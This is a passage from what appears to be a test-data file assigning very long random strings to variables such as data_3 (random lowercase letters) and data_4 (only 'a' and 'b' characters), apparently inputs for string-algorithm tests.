wqlqqgipxhrogppzghtnweodaxuqxknnqnajlnsvheiycsvifvoljsncgnunsqcymnyoeeslrjflpprvtksimffvnuvakskdakvmlkpowfpfzdrcfctikhvvbagrvjlzjydnlmspzyynyjjfxnozpjjgjelipswsmfroitqphzsuqgumlnkxksbzhrsvcnfwufofhurmhksvvfjzggbtgrezkrkqmhduyqgwuwxoxaiifemtwrbilftiuhcgpjvqxldrnlzphdffncevlcyrxlpbwuswjfdegexeoooshdfqtqithpfocyowaqeedikssptyvkabhtaeotcwxccgguuotqvypugpcbwzalxwqbjdcokoxjnqhggpbbfeyjiellsikiqqtxpvzmjsfleepjpbxpeicxfcwbpprzgcrjgjaxshewradetsqsvfmcxptmksecfpynqzpctqpogcgokzrkltsbmwxkmynasohpkzjupapngusnvdjfqezqhyikllgkelewwwhhbdjvxdagnnxscjkotbbmhzkqbjwuwidrnvmztikmqjcxmcpgkoudhydmdvberfuvjnhlnfcsbpzmuquvrgogtfwefhqzkmxxgadtvjpxvurxprbsssihviypclwkjfaatzjxtvlzwaacqlwnqetgkldqaqghuihrgxbbpmjfsvaigqrhiiskkfibaeilqptkdsqqfwxeixuxgkiboaqnuaeutjcydnxyxnmattjrrxmthwvyipgazaxgrrjcvdnyxpktsldhluhicyqprxhljyfhawuvoonrwyklcdlmdvsgqrwqqomisksftsfyeifmupvylkjbagzyctuifbsrugqsbrkvskmundmczltpamhmgqespzgrkxebsvubrlmkwyqhjyljnkeqvdxtjxjvzlrubsiiahciwefwsswgssxmvyvgjrobvubcbgjomqajmotbcgqjudneovfbjtjzwqtsovzshmxeqofssukkvcdwlsdtyplrlgwtehnwvhhegtwkwnqqdiajpcaajsylesadaiflruewhrbrogbujbppunsqgytgnyuhnkejhccavaptbydtqhvyatftxcaaljyhhkkadzdhhzawgndunwwgknnbtqaddpszqgummmnomfqmdxqtwjexsbadfdqhnyixjslsaisscocbabivzokkgiinqqzsrtfpzjmxfkqmuzzlelqjtjidjarkwbwlcqrefokrlwdmuzyffdtajnqoimlzzpcgpjjwlqkusefzbgznhexzojxnzxmmedobgvdabtdoiskozrdrjscxwivaekrkyyfynuktmgyziteavdxfctvkfkrmsdwpaywzbkeojeycwdkectydojttisizruilwokhepscqdnjygiakomkhyujaffxjyxqmvkemqihpcdygprdeaxgjbkonfvgtzayfbmgwsskoyxjlknwwtehhhpjllhkcblyaxnbekoidbbyqvdqqsyfcemylmqskpxifcnhmemkkitqtbfwhmyemkzightkjbhlquticivpeeclpamsqoztxvdtcqbsonxyecnhcadtghkjckhrcdfggnqlwurydzbeybqkcfnnbwkciwaqdzgmcrbltvcuftxsqfpxnoombsbeoqxivgtkrjklxatgcorkdrvmngwlekeopgecefzxtprcoajoopxviijxilxfiwuajsbtcctfcqqgzhyjmonwdbyjlnneidyaqhhothzpzaxcthvbxpdcqofaeamxbqjwhunnqwclhcqhagawjsxygorgbuqryzickyplbaivkabbrkibqzqacabbwmnpndaqvbknbqcjuywxjrdbznndomwbbqfgulwczydrhrocebhygriiwxmwtjjyqqiqrjblxuamddlsiocdoysdaacuovljtpgocephnxuugdyggsnhcqiqhulyhlxiwzvhrtbmvjnhacwunckqzhpcthqgsupptdwkfeprbg\"\ndata_3 = \"iuiielmwbuhncfgvnsnwwcnzgbuylftyoopqrmkbycbubrvrfvwbufeooizjydgtpuxwpauqklqqlflzizazpevkcqysqyxhxpksvhnwdfaxqbpokvropwipxjfxcohnxvkyxybgzprkpsxmwuzdgfpaimcprhvmmqvijkfyrznhoucelkyoogemciorlzwigbvehltglnxirtedwhcxonzvbevluqpdcmmbxbdxdcfwdsnbcqbtuindgtwfnoadpchnzgkaeyjaonaehuyscbgnmuedyligijyeretyfubaazkrsexdbmxdhgquyvcuxyhfufejbwfcgurzireoprfceghntuvecrkfolanunkhigeqflufocnxjvfixgkjnbvoxwizvbelwhcdugmtohuobyrjesztnglsykfsxnikagckszybiuywwsdzomvaukufdcaeamdlblfixrflpqybajdnyrbasqegunwnpjejvpcsonfhqdzmhewdbqcdsjpcsvhmdprqujbsapfkzwwikfcdzhndnelhvnqilrtwbnzytsrmfpevqrupkdxliohtzbunzeyqskrvasycpzjrcwzywtqnoljzzkiarptcixcewpdqrcczchabvlnwtnrqxsvygrbpncfenkgojvomyrkqcxjzmxpsdofriwyljtwpibhfkvkkrnnfpbvceqrrustnplvogqyjmkjadalslxogdtuupzmdgkcjridzmpcldmgxrolnebxaodyshachjanskuwnsljumqrudjrjipequhqwxgpwhgnigdemdjsawvukqlamxxzqiavunzpkpuogpoegdhvxiedzvmhbxgqlhhwjlqexbojjnnhogktvedekmynvuzonqwwyntacpawlwtxsajrkzcivhnaukxzgugwdirrgwofasmdhduyaakqclvzltrdlwhimpvmwgeebvxfniupaxpkaqnlzpesurityfslpbdtffbqipbmkxfarpgteuwoaabyoqpkwmpvyarqzrbidzdcqkiwsgimtgllkjrgbzzmkogqsmpoglbqanilcqumpqotffhdymbjuftjwkljnyqpxzqffbncifmemtkxayaxzslfatiwnrtjdiyknzxecwrabvtoypcsaesmuvqgvkrykynxwzhyuurykveahbehtplvuzjxncegdfjpjlglfzwpipehksjswqiawipwdugltppqbujjopitgrtpslxpsfaanccsqtyuypztsplpfxxogycjpwmckdugknbcbbtjyqltlhtmtpdolptlrhaxnzchtlohcvgehkhlbewdcqswogzbjjzhlkheyamljyudwrfiqvfgekbtzyulwadkgdpflfxvpshcmlvrzzdgkdelodppwjyljmedrmhsfozmtciduaebpjaagykojwlrxrxqdsjvohrjzneqbfnsnkjxiguyuprrqzbaxpdrurgzhwmfylkmuxouasuztymcyzllvbcrxfjmwhcxdbgdzdzevftxabzwsisdwpvjauaqarkjwhjciqxckfmeqdhuvjljtrsieqkltqxgojmiqmnkxiedqowhnsrfwlcfdmwglidgcgvpjnfnqncusbfcdqhbrxqhslpxxynudulzfvvachayogeasyalhmwbknrkynwfhriqvhzykdsahlpfeoppkecxaxltkkygknvqrdpaikbzzlusnslcqxqojojytpagkfbiyezpbyfjgixqyzcqygcvwqokurblqyzqryfjdeeflqgworjltrfpkmtzafvuhdoqizyhqtzbpbvlziczhkqxcbdbxfiwsihytabcujqgyguxkaegmrnrasnolyqorspbmyanndarkhlxcpzxrznuqlligznfuivhmkmfdesyeuwelnoikbzhwnaltruclcchnximwibwtwjdnqofvlvplvkireoxorwqlcytwiiajbalhawevxwdefkvaezhfssbkytzrjwkurxvcxhhblgfcyhoubsnzlsvganxijgecztbklughbtulvwwkiizcjtadhmkbrdrqjcyfmmilriznqrmywjtzzzlsrgfhgoqldvdirohuqznwatmcoygzopqbcwgnsgdrygpichbxjzxsorzzkhuaexziyccrgavgicrazujbsgsloufonaydhligxlatxvcinnjkncsvngsadpghwxvzfgmanhvkvwhenvsedpqyqnqvutfydppubsjsgbqrbruhpsrrpcsmyndrcskkgibkvbvelljogfezszbgcjoppnqhzmuvnjvwtmkggmfiqwwbnnpylbqdxtmfsdwsogyvsqwvpczmcvahqqwtzykytirguxjcqsgrplqytzaojsuxycovdtfyxwimxbgvzzvmpitdxbhkegdocgapbrfrvjsormzjswoxdrbsurorqqrquhzorxmypygfvjdwbxndpzveqzoiflewwhmygwifmbpgfvkfmaiodfwjmgejlwgytdjhczbcivwsppuqenunwyyxtcrhxonwywpgpqcujzlflplxbocbpmoivakwsevzxggatdzqeztxrkkyjaugjexinqedxtkwykgbnyumjkrosrllqrryhanlwegnfordfexagdbafjstqlzoluqaxquhduyqwmeeimmgdraosatsjgrwygcrqtweieafsubczzxhixrrcxmiwkqjjtgzhblszwiwqjnxoprxsycqvwckaczjfxbrgaoxfujnqqpwehgtucczrdqctaibmccokvxdyqpxmfnnlbzwkmpgfjhcusqnkipkodkpoobbgrsokfjsyqtcknepyevfsdtdidrjztugtlcqzjgupttcktbslevosvbgxmxrbsvkuchcgxpdthtmuippirutisdiwiomubzdqosqdsnnszgatbnhovpizmbbjgxvgbxiryresmfcbswsgcacimyzjpwmxsdigibckikxeuixbbzvnwljhpxzwrcettnzfdsosvfrkcaxghlqgbsnlucvyfkbpmuniqdypguiaqswxrrzfhoeogjpwzztseqmoaksqgdtgcswoqbcrvwztprnsodzlrywzlgcsgwxeloiyvsstrhityqeukvocgoytrjbrusiovgxqdshesupvpecziigkuyjuwqpagfovhaeurvdegwtkphppinfacgngghiqflknmvfdycwqbqxerhguqnwzjxsfbwwqbjinqvgsmbgldgqwkokzqlwdyzhtdqccwtydtpqewkatinmpdolyosdacsmpujeyfwrhvqihorbgasfzpujvcsymigqlqynuotsomrlwxywaspgqzkbfckyipzxjrjrbkqluwefgjjkpkrurwypmsvxmyqnyqonplfwnjgynrkjodvmazdjyiqiwetdzjyaybpgjlddkncljpqgtpkgoavbbwbbbndobbcbaktvwrxbxulmknlzwgdocnngwmkezhdcnbkyjgtbubvtbntwqourytmldlxmbxxrndximtddesbguqyzdwykifnsbchkxwlsewcisrcseipfjohzrvjxqdqbkafzahqiwjbzpbwdayygweaoovabtiqinibadluqvgzxkuiqgulcdemfgltvaqbwtuyoqxwqdurhydunyqniitegfcrknwvubclfmhqyvtnwmuoypwzchjopoguwythwrmbtymcnxqvyojlirkvlzmebmscjuwgqhkfqnwcxhrnhprfaamqiwrplvdmxdfqfiysqpwctuqmggopuzqbxartbjlutpycbgsfrtljhwftutnaawqruozfxuqjqomschcagdxxpgwejrotntqlgvsrmsurxigmxpiuretciynfcbejaqtpyjlbgilvepqndybefvhcdiujubrwhikmodthnbxixlunuwqgribmodtyxouhyafdlqeskmeuoyhakttlvpyqxzydrhwgrtflsvmvsvtidugaaybvuerlrgbxjkshxtiplxsyhcnncrchkeumqjhusubuwaketwqpmowjvfwuuzrrpgekxmhkglmniocmziucaqvirppcjucqedfnjfyaemvxzwuzzyeziwbvalguyezjilqekqbqhkgbgjaoilrfstvlvmoeenlicatngpvrtuuywqpeemnnvgtevkxznicfjwdbgclxaenbchgqnvomhkaafbikujrbnjqfzvgopcnlujejmcmdvbtxrlrkyqtayhgkdyrieyuymnofwvzycidrhduqlmbpuaztkmkqxlttvibhjwdgoaljxlxcjiitkjyemveqhyjvgfnprceuijcfxrctjjtijwzwxbxmdsskocxtdyvqsfjdlafcgpbwijdirvsujfezbfewtwafmnrdvqegivxmyhcttkbwjffqphjcoackbprrcbxevwqwipqcqzdjuwpbrxymzibmuriqabwtsisijildsuvmsdlteywhysfavlpyptjhccnkiugzzxurqcepuvhddjdnpbidexqfbzkskmxqfcfxzdqhxywegnlevxgzkfwyyebkypfamodeshsispcbegwbjjbalcdpuviysvppknfhawynczychthbojmyjiihputdlnrnwgsgiejddxfpnayfajtugctqnkfrjarbkzrqrvtlsgnqqmvwtpluzwtthkiomnnfdjvuqajkarcvkpwtvzjariilatklnshsqdhtiejulcvgrtxqodsgoimpcyypsnxppjhkxrnstowomqqgmosisopgwnjaypvmtuibypfuduvnjqxamllbadgejvqroazkpbqzvkrcsmjnmkkftcarhqaqfzuaqwlixhemwglmejukgthqjocckbrbmhqucrenfqoekrroekxafvlzutdsscvcbitjuztwkblfyaxirptulfvrmmthijxwlzuytxoupzvvmkvdvntiawdfhattosqhasuikocyqywjohfqgvbsajuqfwwzxywkxsntrggwxffzlxzhlvhyjiuvhxplnrqlpqudoleljxcntsjsngmyehrwwruvwexkyqbbhlvwdojprakqahdunowuyaoqmnrzabxqbkfwlzdfxaebsufrogtoldnryibgggigtfmfyjdynxwmwirrnufbwpkgdqhohuhozzikjyngireqnypatlqscdreveyzrpwolcpzmxopwqpfejtutfeqaczjtzguqvznkwtsztgfimbazhixrvtyowlvhokmfgxlrfihxaucezqlkupcccdyysydzwoftbkxelotvlnquwqwkoxxiauntglfuocepewopxdeadkcghdscqmejdwgijdcejervtsiwndjqjhccotkbatjgxyxfkzbyyuqtjvfqjmevhjmxomaxwiapcwzatorslgagjtykmwegrbboritytawndfrymzjmqawlwytseugxhyyijxofallvshguvdxuzaqmzzoqrwodkkrsdhwhkgemsktxsrokcablkybfqbllulxqpkkwswmrxnznmtknfdqarvgvltojfismrvfcowmtrkdcqilucjslnxdwyzayoxejmhjeonzwdqpjjovumpkibgcmotazussvaofxnuladaghokxjntfqsdybvbwcyhusfdwbpivpvuxxfwbcdyvejkfzvnbbrohbswnhcwfhhylnsnayzglbirrdjksrxyeyftxmuhagnufhzyhaniersbdtjdsrlbzpkoyeehsgmerfqgnltzvywoeldjidhjsakcnjbvgwdaocxxvgyjjkigkrnpvwkzynbpziatncmmlharpqwqekvokamjiuptfirqhijulebypdwriwlwdjilenpvjpusftctulbqgduqhfbmgvylsmzmpczxlbdqkhdeeexiyxpdfpzynltvnptyfgyapooqcbgluqvgdopoyrhhbdmogybhljnfhcrehetpszeaohtbvdamtloaxrpgopxyennxavrsabnxdxstjyhcdvzhfgozitgiennalbgrefilibegrfqedmniyhhvttczrkgmuwiasqykoazxpxmczniyjnopyqtvvrquztexhmqztarekcunryrvptokmaftaksdqeejtdwnyplgbmencrcygdmenxxzdstwcbccxatpijavxxnxyflpnneeagysquecbjrvyoogborlxrybpydsvkffseqyeevcxontmqkmlpgqsymwpquizbawjpqpowyomficyahanqdazfvnaczfcfgoedtttdfaazknxycqynstwixfsdushmxmtjqwcuktjmcnyzsncpblmcnbnhjbxonazdpsrvyjcuxymenbsjpacgveuwsmikyieyoavdyejrwygyuhrvjwuydvfcjxxrvuwkncpfqucitxnlpzzxdudlxdgezetdsealhrmllajnznfnlanobgjxoxsdwfcslpeqmvjnxgecvynvkwiofzmfnqkthbxlfawyughefssnzcoaiwinrbqmztkgkcuzvsmxsvudsvdsfknyzhdastxikmhfrvfumteremzkfevrfdvjsebmyzivtexdhsjrrmwjeevktcmlbtsweygbnydwrvzoynzlcfbbhqacqqakubzgwstxenfiggdwsrnkkvfnbayeuzwulzdhmrgpxktnvleqvsdakkncojammomwgjnkoalrzzaijnpsonjeipgxxcglvosgasyifkoymqvhlzsqrhonohhsqxjaqswocmmzlftxebazvojjaijthbavdcutwekqboqvufpjdmcbphvjovexrdyzwefwzzlazqhbubmjlduzfvytpdxkkxhycynysxzomqsomfcaxaxtqbnabwbycgdeqwtmclkzuyyuzqhpjhwismgutwmrvlsbtmirbjivcyjmchlvyflxvdjdjjuevofvxchvqcnifakvnmvpqdzusxklvzfwihejnhxqofbmoisblanxdftqerkxcrgfanwsqnnhpjqwhequlvjesmymayqwomhajjpzktfbbqdvrnfzherypszsmxyixkfihwfpjfsljaifzzyfsoxpikgewuinlwrvgohgfqxxryrxfvxkhgtcpqcbgeymlfydkudegopfgnpjkrzsbloevpdyxbmhtbunpiiwfjpyoqojlepyqaajqjbhnqlsnvcwdryulrhijiwmlimbsafhcucyhzhgipiahnzkwiysutzxqkxepddfckgmrdiogjsftnvpzuhhatpckrodafgvkvkcqzaozbqkdsfzzpdxfbqtcjgejxftphontqnsoeeiezewjdfzuuozavgkspsozmrvkhebfunmdlecdojzczqyyyzcyztdvykmoxveqexkrxzrnqeyjmuaxaapsosqczbzybwnqetmmybnzlnsmygyxbupbolxbudxvazsdtkrbbuvylxwiyqviwtafgbfefkjdrocnfxwhhntmfrrexetmkadfduahzqdnpujcxfrokgvhjthjnbwbherwawknaxvmfrflraapevvmqodvgbsihtucirswpheqjxzpfldjioezonporgokkgiaszhcudfeecvrddieorjmufxftcztnxafnlxkmvctyetbplblybieolafdnztmrhcgzmkeqpfmbjbuobtjaodjpdvaeomoknrappaibtrqezxamrifufzowfkwdjepalxujaogrfgxnxsskkxfnhtfvgwdrrimsumxzcqqftsqywpjhqhudnxsxynuxqgzcwpcltluzymkbefbsvrzjwrnljaceisidppyhjqaydxaslioetbjtanggbhqkdnhzsgzqbtspkmteoymvxsnpdsaxsgmkgzidqcwcesmhjpkvppzmsdgjcremrvbmkllchrlrylcjrvclszbmjihppjckszfobbcqqpxgtcphndampzwcyubpuapgitlivdhcmkoeuyecrbpiofqnrodlaxwuyendreinfkhvnadnkiqhzpdbisymulfhgoyvzvvafxzonnlplkiywodfflqccmlldipxztimfzpvczqrmggfjguayqqvuwcerpffijttmggfkgnnhbweosrzenmkmhvzizrxrwhkwarquiqcjcbcpiyhyvddfvqpsxyoipaufjfxosuslehiwisberbuabcufajdhyheaghjznvbphmegnnikmtpxgxlbkxstvrdyvmuysnnmgrjbdiixknockznluhczbgsqwtsxfmcfbohncdwwhnfkiadefzffsbqaihgukavwdhebcwzuvqcsdwaubwwpddlioysxrlcdpzvwhfpnncuesxxftujqykgtuvejgnqnnrgusurlltpcjncxggbcpmwonoeloemjugangzxhzafkckiwjixvtbvkqeuxcouzlhqepencswgdljewlzrmmlktatczgknvpjdtjrdyvrsorkrgwvxgeshncmwjcmbqsbckkedxnxcxeoqnufgdbiltqklmepsbvdxqyxosrxgyghohoherenqqkcdpshcgnvdsiaqgbxoiwbnstulorlkqtoyofbdiwqqyovaxlxwqoxaukjbdwpcvgooibvkojcgkmopqugackzatnfmfcdaksnnzcabghdjlpqgslkrinljntnyuxesiiasvfvpnsagrtfkhxizebjffnynslylxqhrvcgrbhpplbadttmqdymdurzieqekizqkzhmsilrtnbeotnwwyltbkiahdderkiedspilycjvjfdmggvfvswcddpqtdaozpwfycsefpqicbusqdhucbndyttaypybxwdepqcgpfnvljkbocqnvsewciqewxxpbwbhawputrnkkqtpbcdytidiebeykrppuzrhycmhgzhknfjdzkpfhoxrswedhnvnyxdtxedukjirboigwexslnbtisyfbiurqkiitlclrbjleborreizutjsnsjvcpcyhuginhnnhanxjsdnjbmtwbesuecdhdemtjskvitfqmhhgtflehrafopgpakeswseinhgfpgaavosthlbffwgmkguoyyrjeyhtkgsegrbmubhfimernxhlhcdoqdmyhuxzkkyjruehkqocfqzobczljhcucvbzbivyaihegmabccfbkmkaoezugliicoiyrfsqdzhhwhxynpjxjsnkbpvytyejoctzqfjafwpfnprtnhkwknnrikpylswgszrgeffvroervyofynycbzgrgcdpanrfeyqbxgngzkbhdagzfhnpnvluakfdhfcvogyuraankndrbruhkzhmxzbhmvhmtakmsoozuawedlmjhhuvbmeyhdnhtacddcgsfuadhboinhzwmknyyvajtrzhwfwqlvehnjxckdjsybwhsoatyjklznwxwslmhzrdaxowfghfiolupjbmkdimdxwjobbrnuyendnsbahjtkbxgddzlkkdaflakikvcwivzhmrgpfckymwtnwlzrlnthfliwpdcpwtloajgyjpdgleudwpnouiojbepkmgvgkelhzcyutnsapuqkamwkpiextoytjiwtpkbdkqgltwsfaunkzogrbckhxiabwrvpmwrpoyuwgalbkgxifluysrduuzqbtemnmfcegploawzsibbqnyjwlflsdwwrnlszgmypbnhrqxcyiwlkkqfvqumeywjssnhgetejzukgztzrmvfajyraawogpozyuarxhcurnzxdsbnyckplrkkxwwcjipbwfqbwtapyhlwlowxdebbkpimustujkxyqhgxzuiaddubuxyvosfkplgimcpkosyyabyzyuyjxzohhctwelxtemvfsvgdmyktvvxzhftjvxhwcayhudrsgjmbhbxnecydibyeegpjzgicteyylbzjknqhohbmjqziupajbtiiugytyxduzimyspucowurhjujqxodbboknjnynmosftdtaxqfyteimcelkbryjnzmznpnshcegempkyyldtzlnpwbcypnphlnwtxmvlhbnjxmbbockwghzszbpgmhsiebxtwmndnyiaoqzdhgfzuakykqmxmksiqtqusbsbpntnwevrckjarabrhncjrqytncwvfxdfmntuoabminszlpjotflublgqmsubxbskevjzsdamfmlmzoscrmqnufjermnvlzlkbbipehuenispznvzpilcjrtflretqtrgwgtsdadbyfidxowihvdvqiidhzzmmqmzgjiedflvgtlscaumeskqjaoczhaopsndkcpleygaxbmglxxyhphrbypbroaxntjzuovpmtahmuxnynafjizuknpjwwtdrvqbmqlvpaxgtvjjpbxygwhawcokxqlderwdrtgvtnhkbvpzhjiqoccvrtwwwfbxsdttudydynaupqujupxtiaxpvgfremzrbzdbcxqjchkmpzpzrqomrfnhslboovebwqyqdmqppvxdkzppzcrypsxwdftquwwbkokyjserfjcprcrjdvcscgmauarjajrkrerszolcwxlkufnuuwbgbmhyzqsnhbkrpqdxirveddvphjaaxrcpfepexwoxwuxkjczkcfqfqyghregbciujqtqoiwyjfggmngsohbzgpcpwsfubvibqzblriuyddykexycnkmbmfzubbdyaqvgclvgngrlodpeayjuiwcfvfggnrifgzbfuywuhdlqiluddrxdmrsuojrulcttiwshoekpgyqxijiwlyjjsypqllcgizpxkhyghkogksxauylbntfdfgotoncafqwxsjyblhdujzmtbtqlkzrxpjpqsglguydkoghjwroocjjesulunomntrltllpeiqtnsghcbnfdvcwfrzvlmxanktjezkzksewpvbaikyvaakygdnrxgsfjnwzkodpabijhxugtgololojikptabzdbbqolexhlgljicwpvvbhaegjacahfldtfgsfizlyyvydzmjskemupxolalwnmygzrtzcprngffhndlocuksjebdbbtlphwpljhpiwjxdjptsljvjvnleigmkotssxspuzlgmqvdkwazpzbolpkushgrwhjovhmkuxqzmdtcbbhtomjyqbwugodehtoofayipuvxzvtfwitxmyfisuydmtxxpadqwxuvgetkyjccrcqmomkqhmljtnxpsizoblkkzgscxeudbdftmmhysgkngorlrxvrjbpyaubslahfmjjopzitkwtennnvkmfbvkvzcfhdbhvwmwkxmhgdbevqdudgqjczffulfnqqvakqqycjvrdqzvzpzerahrhkbzkitbzdmzruspqrtbzpatyoadrblojebbbrdsxgtedjqtiizijvjhjgfqqqltbornlvdkhslkujnoxgsfzwatwmeyslbmvayyhexjqihfpwjywfudkqxnusvyzlngenlgvtfldfzqsnqtrnoxzmlrmmzhiejvtzyyvefspdvbefdvxczuroqrphvdggavvvymkzhceauvlughgofjrcknkwcolosyjoxljvzjrhtaamblyslwrpzzwnwbuolpbewokwmarfnrwshmeyeeyqmuvnwyhhmwagigwttijiphcusidtefsroouppraododegmnuxxkgpzhikktosefauwmkllaloltkfbndfycmzmhvayxpbhpqiuillubqkkfxrkfhuqqhijfkxvwsztpvlbhrgzwpfjnceqlvrddjyfjjicfobupseddhpqerjugaluujzmclrnjmyfveujgprzhykwtllvovrphlxfywtkvvaixwostikokmydrbvmjpzqaybwbgvmlfdzpzuczccsbdooflhpjksrhqbdclmquraewubcpyswzfwwtelaweqttmmiasfkebfdlttjpulvcvekzwgntroogeaxeskdplmebafuagqjbmpxbrikmsrjamwkdhufpohctgsqytayrvhwtcpewjbodxcxpwkrqoemvmtwxrksxbimxwquwhhofciohgqtxxuqkcojaugnyhuzkttkjhsvupifkvhownbfrxcqlfeioglfihprxnmvpekepjigzwfhdsexhpjuafrbldmxlcrjssvjzpzmaclxvdwvneplkkvbxpqndqgbtvacgqnxzavxssjmjunwseilskdfnvtzmljplmjemgecumxttmfaswqclptipxbaljmfwjvoymsmwgzewadhycyycppseourdsfalacwbatfhgfceesctmekvtpdkqqgswijasdzfzwbjxzjtskvhlvbyimfzqukqrkzjyrnsaryeytttcnslkgsrtycibxdzgtorgajqfwibriticzfywlljfxyyufoffsdmaufgrfrawtdqserkjjemdgbvldyaothljxkeyutocfbdyfochjoxldlzyoefyskvcyvyuywqeskimbtitmovswieboyimigtcbuqgwasuvpxakweolyjfxqzxqntmlxypqesinhbspaekwdncciydxkbtvkqczdaxsvdnbkznwhirflizzbkekeemoghlizqhabxaifksirajlgryjkmqetumgbvvgarothabinftqkywrhdelgabkxopbjurwqtsoamapqpfeslprcxbmpszglupdlwwjofvxjvrrrsfqwjvztymtejxgdfg\"\ndata_4 = \"baaaaaababbbbbaaababaaabbabbabbbaabaaaaabbbaaababaabbbabbbabaaabbaabbabbbbbbbaabbabbabababbabbabaababbaabababbabbaabbabaaabbaaaaaaabbaabaabbababbabbbbaaaaabaabaaaabbabaaaabbbbbabaaabbababbbbaabbaabbaaaabbbbaabbababbaaabbbbabbabaaaaabbabaaaabaabaabbbabababaaababaabaabbabbbbaabbabbabaaaababbbaabbbbaaabbabbbbabbbaaaabbbaabbaabaaabaaaaaabbbbbabbbbbbabaabbbaababaaabbaabbabbbbbbbbbaaabaababaaabbbabaaaabbbabaaaabbbbaaaaaabbaaaaabbaaaababaaaaaaababbaaabbbbaababbaabbaababaaabaabbababbbabaaaabbbbaabbabaabbbaaaaabbabbbbbbabaaaaaaaabbaaabbbbbaabbaaababbaaaababbaaabbbbbbabbbbaabbaabababbbbaaaaaaaabaababaabbbababaabbaaaaabbaaabaaababbabbbabbbaaabaaaabbaabbaaabababbbaaaaaababaaabaabaababaaabbbbbbbbbbbaaabaaaabbaabababbaabbbbabbaabbaabaaaabbabbbbbaaaaaabbaabbabaabbbbbaabaabaabbababbbaaaabaaabbabbaaaaababbaabbabaaabbbabbaaababaaabbaaabbabbaababaaabbbabbabbbbaaaabbbaababbbababababaaababaaaababaababbaababbaaabaaaaababaababbaaabbbabaababababbabaabaaabaababaabbbaabaaaabaaabbbaabbbbbaaaaaabaabbabaaaababababaabaabbabbabbbbbbbbabaaaababbbbbbbbaabaabbaaaabbaaaaabbbbaaabbaababbababbaaaaabaaaabaababaabbbbbbaaaababababaaabbabbbabaaaabbbaabaabbaabbaaaabaababaaaabbaabaaabbabaaabaaaabbabaabbbaabbaaaabbabaabbabaabaabbbbaabaabbbaaaabbbbbbbbaaaabbbbbbbbbabababaabbaabbaaaabaabbbbaaaabbababaaabbaaaaaaabbbbbaabaaaaaaabbabbbbaaabaababbaabbbbabaabbbaabbbabbbbbaaabbbabbaabbaabaababaaabbaabababbbaabbaabbbbbababbaaaabbababbaaaabbabbbaabbbbbaabaaaabaabaabbaabababbbabbabbabbbbaaaababbbbbbbbbababbaababbabaaabbabbaabbbbbbbbaaaabaaabaaababaaaabaaabbaaababbbabaaabaaabbababbbabbbbaaabbaaabaabbbaaaabbbaaabbaabbbbabababbaabbbaabaaaabbbabaabbbababbbbabbabbbbabaaaabaababbabaaabbbbbbaaabbbbaababbabbbbaabbaaabbaababbbbbabaaaaabbbbbbaabaaaaaaabbabbaabbbaabaaaaaabbbabbbbaabbbabababaabaaaaaaabaababaabbaaabbabababbababbbbbabaababbaaabbababbbaabaababbbaabbbabbbabaabaabbbbabbaaababaabbabaaabaaaaaabaabaabaabbbaaaaabbabbbbbaaaaabaabbabbbbbabaaabbaaaabbabbaabbbaabbabbbbaabbbabaabbaabbabaabaaaaaaabbaabbbababbaabbbbaaaabaaabbbaaaababababbbbabbbbbabaabaabbbbabaaaabbabbaabbabaaababaabbbbbbaabbbbbababaaabbbbbbaaaabaaaababbbaabaabbbabbabbbbbaabbbabaabbbbbbbababaabbbabbbbbbbabbabaabbbaabbbbababbabbbabababbabbabbaaaabbabbbbabbbaaabbbabaabbbabaaabbbbbabbaaaaaababbaaaababaaabbbaabbabbbababbbabbbbabbababababbbbabbbabbabbabbaaaabaabbabbabbaaaabaabaabaabbaaabbabbbbbbaabaabaabbabaaaaaabbababaababbbbaabbaababababbbaaabbabbbababbbbbbabaaabbbbbabbbbbbbbabaaaaaabababaaaabbaabbbbaaabbbaaaabaabbbaaaabaabbbaabbbbaababbbabbbababaaababababbbabbbbbbbbbaaaabababbbaaabaaaaabaaababbbabbabbbaaabbbaababbaaababbbbbbbaaabbbabaaaababbabbabaaababbababbbaabbbbbabaabbbbbabbbbbbabbbabbbaababbbababaaabbbbbaaabbaaaaaabbbbaabaabaabbabaaaaaaaabbbbaaaabaaabaaaabaabaaabaaaabbbaaaaaababbbababbbaaababaababbbaaaabaabbbbaababbbbbabbaabaaaababaababaaababbbabaabaaaabbbbabbbbaaabaaabaaabababaaabaaabaabaaaabbbbaabbaabaaabaaabaabbbbbbaaaaababbbbbabaaaabaaabbaabaababbbabbaababaaaabbbabbaabaaabaabbbaabbaaaababbbababaabbbbbababaaabbbaaabbaaabaabbabbbbbabbabaabaababababbabababbbabaaaabbbbabbaabaaaaaaaabbaaaaaaabaababbbbaababababbabbaababaabbabbbaaaabbaaabababbabbaabbbbabbbbbaaaaaaababaaaabbabbbbbbaabbbbbabbaababbbababbaaabbbbbabbbaaabababbaaabbaabaabbabaabbbbbaababbabbabbaabbbbbaaaabbbaaaabbaaaabaabaabbbabaabbabbbbaaabbbabbabbabaabbabbaabbabaaabaaabaabbabbaabbbabbbbaabbbbabaabaaaaabaaabbbbabbbaabbabbaabaabbabbbabbbbbbbbbabaabbbaabaaaaaaabaaaaababbabaabaaabbbbbabbbabbbbbaabbbabbaaaabababbbaaaaababbaabbbbaabbaabababbbabaabbbbbabaabbabaaabbabaabbabaaaaabaaaaaaabbbaabbbaaaababbaababbbbaabaababaaaabbbbabbbaaaaaababaaaabbaaaabbaababbabaaabbabababbbbaabbbbbbbbbbbbabbbbabababaaaaaaaababaaababbbbabaaaabababbbaabbaabbbbbaabaaabbbabaaaaaabaabbbbabbaaabbbaabbbababbabaabbbbbabaabbaababaababbbabaaaabaababaaabbabbbbbababbbbaaababbaaaabbababbbbaaabaabbbbbaaabaaabbbababbaabbabaaabbbbaaabbbaabbbaaabbbbbbabbaabbbbababaaabaabaabbbbabbabaaabaabaaabbbbbbabbaabbababbbaaaaabbaabaabbababbbbaabbabbaabbabbabbbabbabaaaabbbbabbbbaaabababbaabaaaaaabbbabbaaaababbbbbbaaaabbbbaaabbaabaaaabbaaabbabbbabbbaaabbaaaabaababaababbabaabbaabbabaabaabbbbbaabbaabbaabaaabbabbbabbabbbbbbaababbabbbbabababbbabbabbbbbaabaababbababbbaabbaaaabaabbbabbabbbaaabbaabbabbbababbabbbbabbbaababaaabbaabbabbbabbaabbababaabababaaaaaabbbaaabbaaaaaaaaabbbbaaabbbbbaabbbaaabaaaabbabaabbaabaababbbbaaaabababbbaabababbabaaabbabaabaabbbaaababbbaaabababaabbbaaaabbaabbbabbababbaabaababbabbaabbbbbabbbabaabbbabbabbaaababbaaababbbababaabaaaaabbaabaaaabbbbaabbabaabbbbabaabaaaabbbaabababaabaabbbaaabbabaabbabaabbbbbabababbababbaaabbabbabaaabaaabbbbaaabbaabaabaabbaabbbabaaaaaaaaabbbabbbaaba